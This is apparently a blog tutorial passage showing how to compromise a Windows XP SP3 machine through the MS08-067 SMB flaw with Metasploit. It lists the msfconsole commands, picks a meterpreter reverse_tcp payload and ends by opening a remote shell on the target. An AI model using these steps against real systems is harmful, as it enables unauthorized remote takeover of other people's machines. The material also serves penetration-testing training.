From the above we know that 3 port opened by default on Microsoft Windows XP SP3. We want to break the system (target OS) using metasploit on Backtrack 5 R2.
We now run the msfconsole
1. Application > Backtrack > Exploitation Tools > Network Exploitation Tools > Metasploit Framework > msfconsole
Ok, now we can find any weaknesses of the smb application. Just type :
msf > search smb
From the list, we want to use the ms_08_067_netapi, we can get more the information about that weaknes.
We want to use it in Metasploit, just type :
msf > use exploit/windows/smb/ms08_067_netapi
After that, we can see and select the payload that will be used.
We will use windows/meterpreter/reverse_tcp. Then, we must set the several parameters, such as set PAYLOAD, set RHOST, set LHOST, and set LPORT.
To ensure that all parameters are correct, we can type show options command.
Now we are going to launch the exploit
Just type exploit
Now, from meterpreter we can type shell to gain the shell on Windows XP.
Congratulations...! :)
No comments:
Post a Comment